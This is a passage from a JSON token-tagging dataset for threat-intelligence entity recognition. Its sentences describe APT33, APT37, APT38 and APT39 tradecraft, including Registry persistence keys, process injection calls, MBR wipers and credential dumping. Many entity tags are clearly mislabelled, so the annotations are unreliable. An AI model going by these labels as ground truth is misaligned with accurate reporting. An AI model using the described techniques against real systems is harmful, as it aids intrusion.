"scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "deployed", "a", "tool", "known", "as", "DarkComet", "to", "the", "Startup", "folder", "of", "a", "victim,", "and", "used", "Registry", "run", "keys", "to", "gain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "created", "a", "scheduled", "task", "to", "execute", "a", ".vbe", "file", "multiple", "times", "a", "day." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "sent", "spearphishing", "e-mails", "with", "archive", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "sent", "spearphishing", "emails", "containing", "links", "to", ".hta", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT33", "has", "used", "base64", "to", "encode", "command", "and", "control", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "AES", "for", "encryption", "of", "command", "and", "control", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "obtained", "and", "leveraged", "publicly-available", "tools", "for", "early", "intrusion", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "B-Org", "B-OffAct" ] }, { "tokens": [ "APT33", "has", "used", "valid", "accounts", "for", "initial", "access", "and", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "VBScript", "to", "initiate", "the", "delivery", "of", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "HTTP", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "attempted", "to", "use", "WMI", "event", "subscriptions", "to", "establish", "persistence", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "an", "audio", "capturing", "utility", "known", "as", "SOUNDWAVE", "that", "captures", "microphone", "input." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Features" ] }, { "tokens": [ "APT37", "leverages", "social", "networking", "sites", "and", "cloud", "platforms", "(AOL,", "Twitter,", "Yandex,", "Mediafire,", "pCloud,", "Dropbox,", "and", "Box)", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "I-Idus", "I-Idus", "I-Idus", "O", "O", "O", "O", "B-Org", "B-Org", "B-Org", "B-Org", "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "a", "function", "in", "the", "initial", "dropper", "to", "bypass", "Windows", "UAC", "in", "order", "to", "execute", "the", "next", "payload", "with", "higher", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "Ruby", "scripts", "to", "execute", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "a", "credential", "stealer", "known", "as", "ZUMKONG", "that", "can", "harvest", "usernames", "and", "passwords", "stored", "in", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "collected", "data", "from", "victims'", "local", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "access", "to", "destructive", "malware", "that", "is", "capable", "of", "overwriting", "a", "machine's", "Master", "Boot", "Record", "(MBR)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "strategic", "web", "compromises,", "particularly", "of", "South", "Korean", "websites,", "to", "distribute", "malware.", "The", "group", "has", "also", "used", "torrent", "file-sharing", "sites", "to", "more", "indiscriminately", "disseminate", "malware", "to", "victims.", "As", "part", "of", "their", "compromises,", "the", "group", "has", "used", "a", "Javascript", "based", "profiler", "called", "RICECURRY", "to", "profile", "a", "victim's", "web", "browser", "and", "deliver", "malicious", "code", "accordingly." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "I-Area", "I-Area", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "Windows", "DDE", "for", "execution", "of", "commands", "and", "a", "malicious", "VBS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "O", "O", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "exploits", "for", "Flash", "Player", "(CVE-2016-4117,", "CVE-2018-4878),", "Word", "(CVE-2017-0199),", "Internet", "Explorer", "(CVE-2020-1380", "and", "CVE-2020-26411),", "and", "Microsoft", "Edge", "(CVE-2021-26411)", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "I-Tool", "B-Features", "B-Features", "B-Tool", "B-Features", "I-Tool", "I-Tool", "B-Features", "O", "B-Features", "O", "I-Tool", "I-Tool", "B-Features", "O", "O" ] }, { "tokens": [ "APT37", "has", "downloaded", "second", "stage", "malware", "from", "compromised", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "APT37", "has", "signed", "its", "malware", "with", "an", "invalid", "digital", "certificates", "listed", "as", "“Tencent", "Technology", "(Shenzhen)", "Company", "Limited.”" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "sent", "spearphishing", "attachments", "attempting", "to", "get", "a", "user", "to", "open", "them." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "leverages", "the", "Windows", "API", "calls:", "VirtualAlloc(),", "WriteProcessMemory(),", "and", "CreateRemoteThread()", "for", "process", "injection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT37", "obfuscates", "strings", "and", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "a", "Bluetooth", "device", "harvester,", "which", "uses", "Windows", "Bluetooth", "APIs", "to", "find", "information", "on", "connected", "Bluetooth", "devices." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37's", "Freenki", "malware", "lists", "running", "processes", "using", "the", "Microsoft", "Windows", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "injects", "its", "malware", "variant,", "ROKRAT,", "into", "the", "cmd.exe", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT37", "has", "used", "Python", "scripts", "to", "execute", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT37's", "has", "added", "persistence", "via", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT37", "has", "created", "scheduled", "tasks", "to", "run", "malicious", "scripts", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "delivers", "malware", "using", "spearphishing", "emails", "with", "malicious", "HWP", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Way", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT37", "uses", "steganography", "to", "send", "images", "to", "users", "that", "are", "embedded", "with", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "collects", "the", "computer", "name,", "the", "BIOS", "model,", "and", "execution", "path." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "identifies", "the", "victim", "username." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "malware", "that", "will", "issue", "the", "command", "<code>shutdown", "/r", "/t", "1</code>", "to", "reboot", "a", "system", "after", "wiping", "its", "MBR." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "executes", "shellcode", "and", "a", "VBA", "script", "to", "decode", "Base64", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "uses", "HTTPS", "to", "conceal", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT37", "has", "used", "the", "command-line", "interface." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "collected", "browser", "bookmark", "information", "to", "learn", "more", "about", "compromised", "hosts,", "obtain", "personal", "information", "about", "users,", "and", "acquire", "details", "about", "internal", "network", "resources." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "brute", "force", "techniques", "to", "attempt", "account", "access", "when", "passwords", "are", "unknown", "or", "when", "password", "hashes", "are", "unavailable." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "clears", "Window", "Event", "logs", "and", "Sysmon", "logs", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "used", "a", "Trojan", "called", "KEYLIME", "to", "collect", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "CHM", "files", "to", "move", "concealed", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "APT38", "has", "used", "cron", "to", "create", "pre-scheduled", "and", "periodic", "background", "jobs", "on", "a", "Linux", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "a", "custom", "secure", "delete", "function", "to", "make", "deleted", "files", "unrecoverable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "Hermes", "ransomware", "to", "encrypt", "files", "with", "AES256." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "APT38", "has", "collected", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "have", "created", "firewall", "exemptions", "on", "specific", "ports,", "including", "ports", "443,", "6443,", "8443,", "and", "9443." ], "ner_tags": [ "B-Idus", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "a", "custom", "MBR", "wiper", "named", "BOOTWRECK", "to", "render", "systems", "inoperable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "conducted", "watering", "holes", "schemes", "to", "gain", "initial", "access", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "a", "utility", "called", "CLOSESHAVE", "that", "can", "securely", "delete", "a", "file", "from", "the", "system.", "They", "have", "also", "removed", "malware,", "tools,", "or", "other", "non-native", "files", "used", "during", "the", "intrusion", "to", "reduce", "their", "footprint", "or", "as", "part", "of", "the", "post-intrusion", "cleanup", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "have", "enumerated", "files", "and", "directories,", "or", "searched", "in", "specific", "locations", "within", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "prepended", "a", "space", "to", "all", "of", "their", "terminal", "commands", "to", "operate", "without", "leaving", "traces", "in", "the", "HISTCONTROL", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT38", "used", "a", "backdoor,", "NESTEGG,", "that", "has", "the", "capability", "to", "download", "and", "upload", "files", "to", "and", "from", "a", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "used", "a", "Trojan", "called", "KEYLIME", "to", "capture", "keystrokes", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "attempted", "to", "lure", "victims", "into", "enabling", "malicious", "macros", "within", "email", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "APT38", "uses", "a", "tool", "called", "CLEANTOAD", "that", "has", "the", "capability", "to", "modify", "Registry", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "APT38", "has", "used", "the", "Windows", "API", "to", "execute", "code", "within", "a", "victim's", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "enumerated", "network", "shares", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "PowerShell", "to", "execute", "commands", "and", "other", "operational", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "leveraged", "Sysmon", "to", "understand", "the", "processes,", "services", "in", "the", "organization." ], "ner_tags": [ "B-Idus", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "rundll32.exe", "to", "execute", "binaries,", "scripts,", "and", "Control", "Panel", "Item", "files", "and", "to", "execute", "code", "via", "proxy", "to", "avoid", "triggering", "security", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "DYEPACK.FOX", "to", "manipulate", "PDF", "data", "as", "it", "is", "accessed", "to", "remove", "traces", "of", "fraudulent", "SWIFT", "transactions", "from", "the", "data", "displayed", "to", "the", "end", "user." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "Task", "Scheduler", "to", "run", "programs", "at", "system", "startup", "or", "on", "a", "scheduled", "basis", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "identified", "security", "software,", "configurations,", "defensive", "tools,", "and", "sensors", "installed", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "created", "new", "services", "or", "modified", "existing", "ones", "to", "run", "executables,", "commands,", "or", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "several", "code", "packing", "methods", "such", "as", "Themida,", "Enigma,", "VMProtect,", "and", "Obsidium,", "to", "pack", "their", "implants." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "conducted", "spearphishing", "campaigns", "using", "malicious", "email", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "B-OffAct", "O", "O", "B-Tool", "B-Tool" ] }, { "tokens": [ "APT38", "has", "used", "DYEPACK", "to", "create,", "delete,", "and", "alter", "records", "in", "databases", "used", "for", "SWIFT", "transactions." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "attempted", "to", "get", "detailed", "information", "about", "a", "compromised", "host,", "including", "the", "operating", "system,", "version,", "patches,", "hotfixes,", "and", "service", "packs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "installed", "a", "port", "monitoring", "tool,", "MAPMAKER,", "to", "print", "the", "active", "TCP", "connections", "on", "the", "local", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "identified", "primary", "users,", "currently", "logged", "in", "users,", "sets", "of", "users", "that", "commonly", "use", "a", "system,", "or", "inactive", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "a", "custom", "MBR", "wiper", "named", "BOOTWRECK,", "which", "will", "initiate", "a", "system", "reboot", "after", "wiping", "the", "victim's", "MBR." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "modified", "data", "timestamps", "to", "mimic", "files", "that", "are", "in", "the", "same", "folder", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "obtained", "and", "used", "open-source", "tools", "such", "as", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT38", "has", "used", "DYEPACK", "to", "manipulate", "SWIFT", "messages", "en", "route", "to", "a", "printer." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "used", "VBScript", "to", "execute", "commands", "and", "other", "operational", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "used", "a", "backdoor,", "QUICKRIDE,", "to", "communicate", "to", "the", "C2", "server", "over", "HTTP", "and", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "APT38", "has", "used", "web", "shells", "for", "persistence", "or", "to", "ensure", "redundant", "access." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT38", "has", "used", "a", "command-line", "tunneler,", "NACHOCHEESE,", "to", "give", "them", "shell", "access", "to", "a", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT38", "has", "installed", "a", "new", "Windows", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "to", "set", "<code>LoadAppInit_DLLs</code>", "in", "the", "Registry", "key", "<code>SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Windows</code>", "in", "order", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "WinRAR", "and", "7-Zip", "to", "compress", "an", "archive", "stolen", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "utilized", "AutoIt", "malware", "scripts", "embedded", "in", "Microsoft", "Office", "documents", "or", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "the", "BITS", "protocol", "to", "exfiltrate", "stolen", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "communicated", "with", "C2", "through", "files", "uploaded", "to", "and", "downloaded", "from", "DropBox." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "APT39", "has", "used", "Ncrack", "to", "reveal", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "tools", "capable", "of", "stealing", "contents", "of", "the", "clipboard." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "to", "turn", "off", "the", "<code>RequireSigned</code>", "feature", "which", "ensures", "only", "signed", "DLLs", "can", "be", "run", "on", "Windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "utilized", "custom", "scripts", "to", "perform", "internal", "reconnaissance." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "the", "Smartftp", "Password", "Decryptor", "tool", "to", "decrypt", "FTP", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "remote", "access", "tools", "that", "leverage", "DNS", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "various", "tools", "to", "steal", "files", "from", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "to", "decrypt", "encrypted", "CAB", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "to", "drop", "encrypted", "CAB", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "exfiltrated", "stolen", "victim", "data", "through", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "SQL", "injection", "for", "initial", "compromise." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "various", "tools", "to", "proxy", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "to", "delete", "files", "after", "they", "are", "deployed", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "tools", "with", "the", "ability", "to", "search", "for", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "downloaded", "tools", "to", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "utilized", "tools", "to", "capture", "mouse", "movements." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "APT39", "used", "custom", "tools", "to", "create", "SOCK5", "and", "custom", "protocol", "proxies", "between", "infected", "hosts." ], "ner_tags": [ "B-Idus", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "tools", "for", "capturing", "keystrokes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "APT39", "has", "used", "Mimikatz,", "Windows", "Credential", "Editor", "and", "ProcDump", "to", "dump", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "created", "accounts", "on", "multiple", "compromised", "hosts", "to", "perform", "actions", "within", "the", "network." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "utilized", "tools", "to", "aggregate", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "sent", "spearphishing", "emails", "in", "an", "attempt", "to", "lure", "users", "to", "click", "on", "a", "malicious", "attachment." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "sent", "spearphishing", "emails", "in", "an", "attempt", "to", "lure", "users", "to", "click", "on", "a", "malicious", "link." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT39", "has", "used", "malware", "disguised", "as", "Mozilla", "Firefox", "and", "a", "tool", "named", "mfevtpse.exe", "to", "proxy", "C2", "communications,", "closely", "mimicking", "a", "legitimate", "McAfee", "file", "mfevtps.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", 